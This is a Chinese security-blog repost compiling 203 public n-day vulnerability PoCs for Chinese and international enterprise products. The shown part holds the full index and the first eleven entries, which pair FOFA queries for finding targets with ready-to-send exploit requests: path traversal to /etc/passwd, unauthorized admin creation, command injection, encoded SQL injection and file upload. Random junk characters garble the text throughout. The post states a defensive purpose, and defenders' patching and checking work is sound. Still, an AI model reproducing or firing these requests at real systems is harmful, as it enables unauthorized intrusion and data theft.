互联网公开漏洞整理202309-202406
7 [8 i7 H% v! `) }/ O* f- Z道一安全 2024-06-05 07:41 北京. K4 x) N2 G j: k6 p [
以下文章来源于网络安全新视界 ,作者网络安全新视界5 f5 w( r- r7 o, e, \
8 N9 D! w$ N8 M, m
发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。
6 d# ^* c/ W3 W. a- k3 H
" p: C6 G7 s2 O! Z7 I漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。6 [* n8 R* x) a) p D
) \) i9 H+ P# y( c$ ~6 @% O安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。
4 K8 f( Y" J8 E6 B* Z* H
/ M4 ~( W# W) f. T+ d7 ^; v& t文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。* _% {! H, K a2 J
& e% E4 t1 Y8 A1 o& d% [0 A% R
合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。
/ \* h- B' b7 k" t6 H& U0 e' r- D8 e# b5 C. C
4 y3 P& k9 P% {* e) a! a
声明
+ I6 B. J& Z3 T+ k0 C) R
5 f! d# R6 u) t为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。
8 n; G/ X8 J; K) O
( t. k E0 c1 q4 M5 q4 s有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。' S; |7 i# w+ W9 m5 x# l: d4 y
$ O2 `8 }. M2 f
4 B9 I+ W- ?6 @) \. x0 y) @8 C b; ]( r! T, r# U- T! s- Z
目录( Y& b+ B! U: Q5 C; y( M
; S" u' V, @) b7 z# l) a
01
- h, p g7 _" a+ G) }0 _5 Q& q
8 ?! |! M9 A2 w4 Y* u% L1. StarRocks MPP数据库未授权访问
1 X m6 K6 e% w) h+ L0 N2. Casdoor系统static任意文件读取) w0 Q. b- n" U1 c$ W5 D0 C* i
3. EasyCVR智能边缘网关 userlist 信息泄漏
! \3 E4 o! B/ ]* ^5 y4. EasyCVR视频管理平台存在任意用户添加! v8 O5 s9 M1 E9 H) T
5. NUUO NVR 视频存储管理设备远程命令执行
' \3 P# p3 L6 m6. 深信服 NGAF 任意文件读取3 a( Q( c, a( T3 a$ a- q/ `" x# ~
7. 鸿运主动安全监控云平台任意文件下载
# ?. \* E' N/ R( b' F( G8. 斐讯 Phicomm 路由器RCE
. ?$ ^+ D c3 A$ r/ {9. 稻壳CMS keyword 未授权SQL注入& V* z8 k4 s4 M
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
8 @0 V' Q$ y, k0 n11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
) z$ q2 ^9 s( E$ T- [2 M12. Jorani < 1.0.2 远程命令执行
2 M H# L/ d2 v+ t& ~1 Q2 C; m13. 红帆iOffice ioFileDown任意文件读取5 a# S( @' A8 h2 K( D4 t+ r! e3 W& U4 F
14. 华夏ERP(jshERP)敏感信息泄露
/ a ^: w! H, s8 {; Z+ j15. 华夏ERP getAllList信息泄露7 i, B Y. F, K1 ?# y
16. 红帆HFOffice医微云SQL注入. \* N( R1 v# U
17. 大华 DSS itcBulletin SQL 注入
) w" o! Y- I0 X! J/ W18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
. N# i! I1 Z Z a$ K J! a" ?% u$ q19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入# w4 C+ S2 w2 L4 I+ w7 u, V
20. 大华ICC智能物联综合管理平台任意文件读取
% z6 Y" k" s+ v/ [$ F21. 大华ICC智能物联综合管理平台random远程代码执行
+ ]) T0 e2 p4 M- `& g9 l& V6 ~: B22. 大华ICC智能物联综合管理平台 log4j远程代码执行
5 f2 r% S& Q% @$ o5 w23. 大华ICC智能物联综合管理平台 fastjson远程代码执行8 x/ V9 K9 b. z/ g; K
24. 用友NC 6.5 accept.jsp任意文件上传9 Y3 I8 g: @* K
25. 用友NC registerServlet JNDI 远程代码执行
@" O3 C3 L2 U4 u' ~" _ o26. 用友NC linkVoucher SQL注入6 B* m/ `4 a, b( K4 s: r
27. 用友 NC showcontent SQL注入
5 W! T7 m/ ]. t) ^/ F* d7 X6 J# ^$ B* {28. 用友NC grouptemplet 任意文件上传
, [( U" `+ u5 S* I. W29. 用友NC down/bill SQL注入& ~$ o& n# t$ T x3 C3 a
30. 用友NC importPml SQL注入
- a9 O' K4 ?: S31. 用友NC runStateServlet SQL注入
4 ~, J G1 o2 `32. 用友NC complainbilldetail SQL注入$ T( e: S$ F3 }7 w+ f0 |2 C% V
33. 用友NC downTax/download SQL注入, v/ [! i/ i/ I+ s9 T% n% z, ^
34. 用友NC warningDetailInfo接口SQL注入
$ `/ a3 ]0 S1 N# U S35. 用友NC-Cloud importhttpscer任意文件上传
# x' u( b" w/ D- R" u" X Q; Q3 }36. 用友NC-Cloud soapFormat XXE
# J7 d8 u. W7 Z- [/ B37. 用友NC-Cloud IUpdateService XXE8 ?6 W: k4 Q# z# i9 `
38. 用友U8 Cloud smartweb2.RPC.d XXE$ C1 F# |! g3 }; ` c3 T8 X
39. 用友U8 Cloud RegisterServlet SQL注入
+ _. [! }6 J b( b40. 用友U8-Cloud XChangeServlet XXE
+ U' f* L ^6 v8 W. D41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
3 J9 e U! n1 S42. 用友GRP-U8 SmartUpload01 文件上传( {& f4 m+ X3 H' R7 M7 m5 C
43. 用友GRP-U8 userInfoWeb SQL注入致RCE( E% |" q; z7 Z. T; Z# _8 s
44. 用友GRP-U8 bx_dj_check.jsp SQL注入0 h+ u) r8 k- z
45. 用友GRP-U8 ufgovbank XXE
$ @! j2 N2 Z; M, e* i* h46. 用友GRP-U8 sqcxIndex.jsp SQL注入
2 x4 _5 |4 X- o: }% s47. 用友GRP A++Cloud 政府财务云 任意文件读取! y8 d+ c! f( [% U
48. 用友U8 CRM swfupload 任意文件上传
! l* L' S0 N0 ~2 q0 O49. 用友U8 CRM系统uploadfile.php接口任意文件上传
~( O5 ~; p; J. _50. QDocs Smart School 6.4.1 filterRecords SQL注入
9 A: x% _: ^# m* E. B# U2 P51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
; I2 b2 Z0 v# y+ y9 P7 B52. 泛微E-Office json_common.php sql注入
; }3 |* [& x; h5 }; o% f5 \- R6 n53. 迪普 DPTech VPN Service 任意文件上传3 }$ e4 N1 k* v
54. 畅捷通T+ getstorewarehousebystore 远程代码执行
* v0 ?* M1 G, g0 i# e( c55. 畅捷通T+ getdecallusers信息泄露
$ ]2 f5 B3 N3 @& h# n) I56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
! i( G0 c* D+ m" I! l57. 畅捷通T+ keyEdit.aspx SQL注入0 G3 T) _3 g# V: P) b
58. 畅捷通T+ KeyInfoList.aspx sql注入: ?1 [0 @, \3 [
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
! a" a" f9 l3 A/ ^: J3 }( g60. 百卓Smart管理平台 importexport.php SQL注入* t, K* L! i& k7 Z
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传- C w* h/ c& w
62. IP-guard WebServer 远程命令执行4 C; B* R0 V) o4 b! G
63. IP-guard WebServer任意文件读取
* @3 x4 a3 i, ] y, s64. 捷诚管理信息系统CWSFinanceCommon SQL注入; E* S% I; f/ C$ ?, z. ~5 i# S
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过) i$ F, C. D4 u
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入) @3 }5 z, ~' n
67. 万户ezOFFICE wpsservlet任意文件上传
7 s$ F3 I) S9 h0 a, _# H/ q$ w68. 万户ezOFFICE wf_printnum.jsp SQL注入
. K, O8 _- {1 Z6 Y# R6 x69. 万户 ezOFFICE contract_gd.jsp SQL注入8 W5 S; n' }/ d2 Z0 h$ `
70. 万户ezEIP success 命令执行+ I. A8 O6 v$ R/ ]- R
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
" [: A4 [5 X7 z72. 致远OA getAjaxDataServlet XXE5 D) R1 t: m! r7 h A# T# C Q
73. GeoServer wms远程代码执行
% D p0 ]6 X. g: K' ~0 O74. 致远M3-server 6_1sp1 反序列化RCE: B/ V- p; y, [& X1 y3 I& S; _
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE( m8 a$ h2 M e) @" ]3 p
76. 新开普掌上校园服务管理平台service.action远程命令执行
1 p+ X; k/ K% i! D8 s# J77. F22服装管理软件系统UploadHandler.ashx任意文件上传/ Q# ]7 V* p1 k6 ^
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
$ m( f+ `. u1 Q$ Q1 u: O79. BYTEVALUE 百为流控路由器远程命令执行
$ L }1 \4 e K, N& B" ? r6 a+ p80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传) h1 H0 Z% a7 `* N
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露. p& c% p8 |& B) W1 Q; n7 ]$ m& a$ Z
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
( ]" g. S5 Q4 O) S8 h$ P) g% P83. JeecgBoot testConnection 远程命令执行2 P9 g( I3 }3 A5 M. K# R9 j% `7 O
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入 }4 a# ?7 D0 u
85. SysAid On-premise< 23.3.36远程代码执行
$ c1 w- ^; r: S0 G! L' L/ L86. 日本tosei自助洗衣机RCE: c( p; B9 ~ _5 N' r6 n/ x
87. 安恒明御安全网关aaa_local_web_preview文件上传 r+ ~, c1 K0 w. w* U% e5 G
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行( y' _+ U0 {6 O/ R% d7 M# U( B
89. 致远互联FE协作办公平台editflow_manager存在sql注入6 h* U; b: B' i* W/ Q2 g( }
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行- `3 _7 y% L- M
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取: N5 S, I \& w
92. 海康威视运行管理中心session命令执行1 r: o6 e) t Z; `
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传5 |! K- u; Y; r5 l( ?" D% s% t9 ~
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传9 ]/ H: m0 R1 Z; @) E6 v* Y
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行& b0 Z ?; a0 S7 @$ |: q& T
96. Apache OFBiz 18.12.11 groovy 远程代码执行
3 p, G3 {/ h- B6 o4 }97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行; D: p, v; U* E; n
98. SpiderFlow爬虫平台远程命令执行
" r& ^$ W) G" I2 l' R) E" Z! B99. Ncast盈可视高清智能录播系统busiFacade RCE/ S" I; d$ c7 I! x
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
& A, R( P2 a9 j, n( a% q101. ivanti policy secure-22.6命令注入
. l. T a9 W. K2 o' F: O102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行& `1 H* G* {, p! H* Y% @
103. Ivanti Pulse Connect Secure VPN XXE6 ^" s, f0 X2 G g: A
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
, V4 O# a0 V' v) R) ~0 r105. SpringBlade v3.2.0 export-user SQL 注入
1 g2 S* r; h8 G9 b7 S$ \106. SpringBlade dict-biz/list SQL 注入& m8 b) M" [4 b0 y
107. SpringBlade tenant/list SQL 注入
& H4 P e; ]4 H4 s Y; n+ U6 Q# Y108. D-Tale 3.9.0 SSRF( l8 P T4 N0 B) a( F& P9 Q! b
109. Jenkins CLI 任意文件读取" d: V, ?# O, c7 U2 G A
110. Goanywhere MFT 未授权创建管理员5 n7 n& I; ]4 Z2 f W$ |) I4 v1 H
111. WordPress Plugin HTML5 Video Player SQL注入
8 _1 [8 l# q" Z/ E5 ~112. WordPress Plugin NotificationX SQL 注入/ @1 q. a2 X2 ?, A9 ]
113. WordPress Automatic 插件任意文件下载和SSRF
6 U( G' I- Z* f' Q- t0 d1 {114. WordPress MasterStudy LMS插件 SQL注入" ?* a1 p p1 k1 M. I) x- H
115. WordPress Bricks Builder <= 1.9.6 RCE: P# K- T. S; o0 L* q
116. wordpress js-support-ticket文件上传
& ^% b, j2 ^+ X: T( M' A117. WordPress LayerSlider插件SQL注入
; l+ ]. j& n5 \5 r8 m, |118. 北京百绰智能S210管理平台uploadfile.php任意文件上传5 {( q, v) o. C: j
119. 北京百绰智能S20后台sysmanageajax.php sql注入$ m: }, S/ ~. [1 i& t9 X! O
120. 北京百绰智能S40管理平台导入web.php任意文件上传: I4 e# _+ q$ U: D+ m1 S g
121. 北京百绰智能S42管理平台userattestation.php任意文件上传
# P* ]/ T$ d8 W5 ~6 c7 E- n: i122. 北京百绰智能s200管理平台/importexport.php sql注入
( l5 Y; U4 f+ `9 `' {123. Atlassian Confluence 模板注入代码执行
1 |, H" B( @# e2 |6 {124. 湖南建研工程质量检测系统任意文件上传; t9 b! Q3 I) W9 T' G
125. ConnectWise ScreenConnect身份验证绕过6 B* F3 h3 U) X7 J, d
126. Aiohttp 路径遍历: t2 e9 p8 m$ q% A) q8 Q! V/ Q
127. 广联达Linkworks DataExchange.ashx XXE
, t- x* G3 j8 G% N# l128. Adobe ColdFusion 反序列化) Z4 p0 Q6 Z G; }1 G, @" y; t" E
129. Adobe ColdFusion 任意文件读取
0 F2 P; K% L! W+ Y130. Laykefu客服系统任意文件上传
- O; v, ]6 ?6 K% T; P; j131. Mini-Tmall <=20231017 SQL注入& t; }& B- c- u6 b* L) X3 U1 u
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
: H4 i6 `. T& G _2 M" i133. H5 云商城 file.php 文件上传( M: q6 _6 i( N8 P
134. 网康NS-ASG应用安全网关index.php sql注入/ J8 Z8 {- G+ V4 ]
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
% G* i2 i7 |2 s, E- r9 ?2 \2 j136. NextChat cors SSRF/ P6 b" A. A: W' D1 |
137. 福建科立迅通信指挥调度平台down_file.php sql注入- o4 g8 u/ p) n
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
. `7 l! ]9 {+ Q, V( K+ Y1 ]% n139. 福建科立讯通信指挥调度平台editemedia.php sql注入0 B* ?: D0 {! n$ v/ I3 x
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
4 u4 w9 f/ n, Y( t! X141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
. G5 E/ b4 I( d% T# b' r- g; A142. CMSV6车辆监控平台系统中存在弱密码
/ j( T" m% {5 |& f( w143. Netis WF2780 v2.1.40144 远程命令执行' K3 N& s- V) g! b
144. D-Link nas_sharing.cgi 命令注入! j0 ~6 {% F, S( M5 Q
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入# j& N E' F: H5 M8 ~6 u: i
146. MajorDoMo thumb.php 未授权远程代码执行6 q! N1 n& A8 S* a: A; Z
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
# C% R: _! ]% ? j D+ F, k148. CrushFTP 认证绕过模板注入
" R7 c, B3 Q4 d) o6 {2 A0 m149. AJ-Report开源数据大屏存在远程命令执行
n9 H; d# M( r$ a& a( Q" M150. AJ-Report 1.4.0 认证绕过与远程代码执行
0 }" C9 t5 o( Q$ {151. AJ-Report 1.4.1 pageList sql注入
8 y8 ?3 D, @% V; w2 @( a5 [4 C1 q152. Progress Kemp LoadMaster 远程命令执行8 S( \; ~! e' D; X3 |* Y9 \6 X
153. gradio任意文件读取
7 J# A8 u# m! C5 h( ~+ Z8 Y) C154. 天维尔消防救援作战调度平台 SQL注入; v& M0 T! `8 X0 }7 @- ^! @$ C' t9 G
155. 六零导航页 file.php 任意文件上传
. x L- k* V3 Q# T9 s$ G+ c N156. TBK DVR-4104/DVR-4216 操作系统命令注入 C/ z/ R& T6 A' m" E
157. 美特CRM upload.jsp 任意文件上传
+ K* |* ]/ Z0 S Z' G# H) l2 f5 O158. Mura-CMS-processAsyncObject存在SQL注入
+ M5 t% c, D! N% `* |1 t159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传
$ Z1 w; l' L3 F0 t) C1 [160. Sonatype Nexus Repository 3目录遍历与文件读取
4 i% W7 N# [4 ^0 X161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传+ t D2 O% h/ D: H/ L
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
* W& i$ P0 d; X! K* g3 I& E163. 号卡极团分销管理系统 ue_serve.php 任意文件上传* |2 C e& X+ V# g* n1 J( V. @
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
' F) O) e: N3 @ K. q8 [165. OrangeHRM 3.3.3 SQL 注入
9 I& S" f+ o3 F* B166. 中成科信票务管理平台SeatMapHandler SQL注入
O2 l! H- t- g/ [9 V, X \) i167. 精益价值管理系统 DownLoad.aspx任意文件读取
- G% ~2 L& W& y4 M1 T168. 宏景EHR OutputCode 任意文件读取
: e ~! A+ b/ A) x- f- O- ]. F169. 宏景EHR downlawbase SQL注入! i8 ?. e G# M
170. 宏景EHR DisplayExcelCustomReport 任意文件读取
. R* L/ q% V0 c3 i171. 通天星CMSV6车载定位监控平台 SQL注入1 @' L6 I# e* P7 C
172. DT-高清车牌识别摄像机任意文件读取
1 g5 H1 [9 Z9 f2 W# u173. Check Point 安全网关任意文件读取
% c" P3 p7 D9 ]) Q. D+ b0 z8 D; B174. 金和OA C6 FileDownLoad.aspx 任意文件读取; Z+ B7 U- C% L- w! L# n/ C' t& B
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入" E4 u2 ^6 V) }- O T
176. 电信网关配置管理系统 rewrite.php 文件上传7 x3 ^4 d' X% q4 s, _* r. {( S& h
177. H3C路由器敏感信息泄露
1 ~" a0 n5 @1 ~/ Z4 d178. H3C校园网自助服务系统-flexfileupload-任意文件上传, Y; G9 y+ ~% R; q5 Z0 R
179. 建文工程管理系统存在任意文件读取
2 J) Z) G, B4 j$ U6 b; ^, T8 V0 S' E: ?2 u180. 帮管客 CRM jiliyu SQL注入
- L7 R' u2 \5 i3 o5 T6 I% T/ x0 R181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
# }9 l4 g* d$ |3 P U: {) L+ ^182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
/ C- y7 b$ |( n, ]" ~3 \183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
9 |6 a3 C L i. t184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加- u, @/ {' K) Y9 h. g1 O0 L
185. 瑞友天翼应用虚拟化系统SQL注入
- c! z/ w2 T% S$ s: \- Z186. F-logic DataCube3 SQL注入
' Q# m# z9 u7 Z8 o0 W187. Mura CMS processAsyncObject SQL注入! t$ m, v, g) g
188. 叁体-佳会视频会议 attachment 任意文件读取' `7 F3 V) o3 B& D
189. 蓝网科技临床浏览系统 deleteStudy SQL注入$ ]; _/ X: r: D4 t, v! |5 d: W
190. 短视频矩阵营销系统 poihuoqu 任意文件读取
# F3 _0 Y( a; S% r5 q8 v( {191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
9 v! u* I9 O F9 s9 ]$ s192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
& Z% r% @# \( j193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
( w; {$ A7 W. f/ y& u- ?9 `4 P; ^194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
; P* K/ I' }2 S$ y1 V1 C195. 飞鱼星上网行为管理系统 send_order.cgi命令执行* Y+ {* I6 [6 e# i, g
196. 河南省风速科技统一认证平台密码重置
; |: V+ @* ^# Z197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入3 U, l' c. w$ g( c' S! \' |' p* E
198. 阿里云盘 WebDAV 命令注入7 _1 [. i" [, t5 i6 Y# R/ {
199. cockpit系统assetsmanager_upload接口 文件上传
' D/ M+ r, h; P( }$ q6 v- H, N200. SeaCMS海洋影视管理系统dmku SQL注入! K/ Z0 P) _, F( V1 }% M3 j
201. 方正全媒体新闻采编系统 binary SQL注入8 b* r, i; C+ p+ }
202. 微擎系统 AccountEdit任意文件上传
& Z) i* e: E$ b- J. s3 z203. 红海云EHR PtFjk 文件上传1 t3 a9 p* U& N6 x
/ ?3 K5 S4 A5 x, G2 t5 s2 L' ~) B, BPOC列表3 I1 _1 D) [" o; G* }$ h* f5 L. j
; M% I8 |1 k5 G0 u% w
02
' V1 X9 A' ?1 E2 ]( w7 [1 Y. x( i
$ h1 k' {* Q; n6 z& f1. StarRocks MPP数据库未授权访问# [# h \- m! T8 w9 D( S' |
FOFA :title="StarRocks" Y+ Z8 B x6 ~. g
GET /mem_tracker HTTP/1.1
5 g5 ?1 o% y' w% p1 ]Host: URL% B; l: z) S; B9 c
% T+ W$ v; \4 P9 k; ^2 _4 @+ x4 y
- h( b2 S) c* t* L3 c* ]2. Casdoor系统static任意文件读取7 s1 q6 v0 f9 R
FOFA :title="Casdoor"/ z$ v+ }' Z) Y! p, R
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.19 B" ^- A' F' ]" L) {" \/ M
Host: xx.xx.xx.xx:9999
' e4 j I- Q1 d/ N0 F4 b1 kUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.364 [2 M( a4 B/ ?* ^9 B6 T( {
Connection: close
) ^% V# z, ^! `, ?Accept: */*
2 a( h( ]* F" s" J3 CAccept-Language: en4 v' G' F. n" Y
Accept-Encoding: gzip
5 Y! i9 O; ?6 R4 O9 ]4 g+ ~' L0 |" a
# I) x) F; |1 N+ h. {3. EasyCVR智能边缘网关 userlist 信息泄漏: G1 T6 ]' H# E% W$ ^* [( L
FOFA :title="EasyCVR"+ O# d1 X6 v' v& E% v! B
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
$ H/ H5 e6 M' T0 J5 \4 ^7 d# y8 W& eHost: xx.xx.xx.xx
+ Q' t/ z/ w- I, p+ F! @( |
" A5 z- e: ^- a; Y& d7 j+ C' j4 h% y, ?0 b+ t! ?! S
4. EasyCVR视频管理平台存在任意用户添加
, d" ~5 x) u9 ~+ j3 u/ j& V$ }8 @FOFA :title="EasyCVR"
. B' D8 F1 X7 P# d: V% J8 F
+ Q6 t1 h# y y2 s( J. `! Dpassword更改为自己的密码md5+ k# T' X$ L6 t( a9 J v3 _
POST /api/v1/adduser HTTP/1.13 c9 Q, Y. @% h
Host: your-ip0 w9 A/ o4 B4 U, n) i6 G
Content-Type: application/x-www-form-urlencoded; charset=UTF-80 C% {, f& R; |% }
6 ~& b. K* u j, Y7 Nname=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=10 K+ V. @' W" v% s9 E
* G9 d- D& r, z* q" k" h& G5 G) o6 U, }
5. NUUO NVR 视频存储管理设备远程命令执行
1 I7 g, y2 W5 {6 r$ h( FFOFA:title="Network Video Recorder Login" V6 G# u+ Y0 J+ C" Y% n
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.11 |4 [! a/ d+ S8 k- _
Host: xx.xx.xx.xx
+ ]6 Q1 K' C1 G F
7 i [: a; A! u: X3 [' |% n3 y; |( F5 o# A u' U) y
6. 深信服 NGAF 任意文件读取5 W+ u1 N8 U# F
FOFA:title="SANGFOR | NGAF" z! Q6 [6 [ t) z. d( e
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1- L- B/ P) N+ Y5 T* B
Host:
# r; z8 n, B" j- z- M
% y n* S2 k4 m9 B
* s, h5 d2 A0 H; ~( w- [7. 鸿运主动安全监控云平台任意文件下载
- ~- ~' \: o$ y b( r4 C6 p9 jFOFA:body="./open/webApi.html"1 Y- Z1 e R- F# K
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.18 ^) v" @" {( W# @9 s+ r% P
Host:
! V& K5 a% W0 ~0 [7 ~& S; \" V9 k# S& @' H/ L
0 e. c# g& ^' }8. 斐讯 Phicomm 路由器RCE
. ]% u X7 |$ v1 D; RFOFA:icon_hash="-1344736688"+ y" z3 N" ~" j
默认账号admin登录后台后,执行操作
4 F, u9 j% D. f: d$ S1 @0 r' gPOST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1& m; I; G7 [# N9 I
Host: x.x.x.x0 \, L1 \/ m8 p- {9 f
Cookie: sysauth=第一步登录获取的cookie
1 X3 ?+ r) V4 j' ZContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
9 o% s2 v# X! J+ w; q4 u K A" dUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.361 ]7 K& y, k% |3 O7 Q
' Q9 `( f7 p6 D' W
------WebKitFormBoundaryxbgjoytz8 [9 h5 H2 {& f$ W8 W- t
Content-Disposition: form-data; name="wifiRebootEnablestatus"
) S* P: {/ T5 ^* T8 \7 n6 C0 i! R" f; V" d
%s
1 U4 R; `) C4 H4 g% [9 T. w------WebKitFormBoundaryxbgjoytz9 p) D5 w/ Y5 p9 r* d7 X0 H
Content-Disposition: form-data; name="wifiRebootrange"
$ J$ u" o) S* I* N! |( H5 ?2 o3 O, ]5 T% r( d
12:00; id;
) x7 b6 j2 W4 n& h; H* I- `------WebKitFormBoundaryxbgjoytz
0 O( K: D3 G6 B# P9 w1 @; ^4 dContent-Disposition: form-data; name="wifiRebootendrange"1 z* |% ~ V4 F: k( w: Q
/ V8 a# `3 ^ f9 ^( Y( a+ o9 d
%s:
9 `4 H0 J: c) H4 @ S------WebKitFormBoundaryxbgjoytz1 \ F' t7 B9 T) R2 [( Q
Content-Disposition: form-data; name="cururl2"
# c( _: V; N" L5 t% i% k4 b7 V
2 |* q1 |7 a e- O: g. x% Q7 k% ?: D5 o9 ^) @% ]
------WebKitFormBoundaryxbgjoytz--
; z$ b/ u( i3 q) j
: n% I- y) \5 J
# s7 X" \) I" L0 i3 E! J9. 稻壳CMS keyword 未授权SQL注入
0 ?0 ?/ h6 L" K) }, w0 jFOFA:app="Doccms"% e0 h' Z5 W9 k( ~
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1% z1 H4 x, V' u+ @
Host: x.x.x.x
: t" `0 s# q n7 i7 w. ~0 ?& N' H& d" E
9 c3 a, M$ a- I8 I
payload为下列语句的二次Url编码
: k) n8 x' h( k0 t" B1 H4 ?% m0 R$ _$ v! S* b1 Q
' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#9 f* C7 H+ s' x
/ a0 w$ p% e0 a# s) k3 ?- |
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
Y6 o j& P( C2 U3 TFOFA:icon_hash="953405444"
" \& H/ R; K/ w% u% V3 [2 R. I8 @! ^- s" `2 D( B; C4 J! Q: D- \; y
文件上传后响应中包含上传文件的路径
3 @4 x9 i* \9 {' fPOST /eis/service/api.aspx?action=saveImg HTTP/1.13 u+ M7 D5 h. P, z. i
Host: x.x.x.x:xx
9 N& Q! a) G0 }4 ~# o. lUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36; _7 F- a2 e5 D v# _8 v& t/ P
Content-Length: 1971 W' ]- E& |! ~+ d" f) ]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
1 Y( x W! w* p2 C' s' u. _! pAccept-Encoding: gzip, deflate, Z. ~( K4 L2 ]7 n! j6 w
Accept-Language: zh-CN,zh;q=0.9* a% c% x: o7 f1 t2 O0 N s
Connection: close
" k. K# U8 r. T: y7 ?8 JContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu
# Y1 k0 X, l4 ^( l7 S8 ~
/ q; y! G, _. P' H5 s------WebKitFormBoundaryxdgaqmqu9 t7 }# E+ g; @$ L9 @7 K. ^/ c
Content-Disposition: form-data; name="file"filename="icfitnya.txt"
, Q0 Z% B E2 sContent-Type: text/html
- n6 `# G4 y& b! z
- \5 }; C: x- h& c$ y0 G0 mjmnqjfdsupxgfidopeixbgsxbf
7 z7 H7 _; D% B J4 z0 S+ b A------WebKitFormBoundaryxdgaqmqu--
0 B4 N2 s" u9 L F% {( t3 b8 A, g
6 _5 w. P3 R8 |' n! ?7 Z2 G9 t. Q
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入9 W8 ?8 P0 J$ i: \) r5 c7 q
FOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"
